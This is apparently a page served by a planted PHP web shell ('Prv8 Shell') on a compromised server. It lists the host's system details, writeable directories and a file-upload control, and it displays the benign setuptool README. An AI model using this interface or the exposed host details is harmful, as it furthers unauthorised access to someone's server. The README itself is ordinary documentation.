Prv8 Shell
Server : Apache
System : Linux server.mata-lashes.com 3.10.0-1160.90.1.el7.x86_64 #1 SMP Thu May 4 15:21:22 UTC 2023 x86_64
User : matalashes ( 1004)
PHP Version : 8.1.29
Disable Function : NONE
Directory :  /usr/share/doc/setuptool-1.19.11/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/setuptool-1.19.11/README
The setuptool program (setup) is a front-end menu program for a group of other
tools.  The list of options which it presents is assembled by scanning
/etc/setuptool.d and /usr/share/setuptool/setuptool.d for files.

Each file in the directory should contain one or more lines of text.  Each line
contains from one to four fields which are separated by "|" characters.  In
order, they are:
  - the path to the binary to invoke
    (Mandatory)
  - the untranslated name of the application which should be displayed
    (If unset, defaults to the path of the binary, but don't depend on that.)
  - the gettext textdomain in which a translation of the name of the
    application can be found
    (If unset, defaults to "setup".)
  - the directory in which translations for the textdomain can be found
    (If unset, defaults to "/usr/share/locale".)

If multiple entries with the same untranslated name exist, the one which was
read FIRST takes precedence.  Files are read in name collation order.

A contrived example would create /etc/setuptool.d/00bogus with these contents:
  /bin/ls --color; /bin/sleep 5|Example "ls" invocation.
or
  /bin/ls --color; /bin/sleep 5|Give this help list|libc
to use one of libc's (not meaningful here, but) translatable messages.

haha - 2025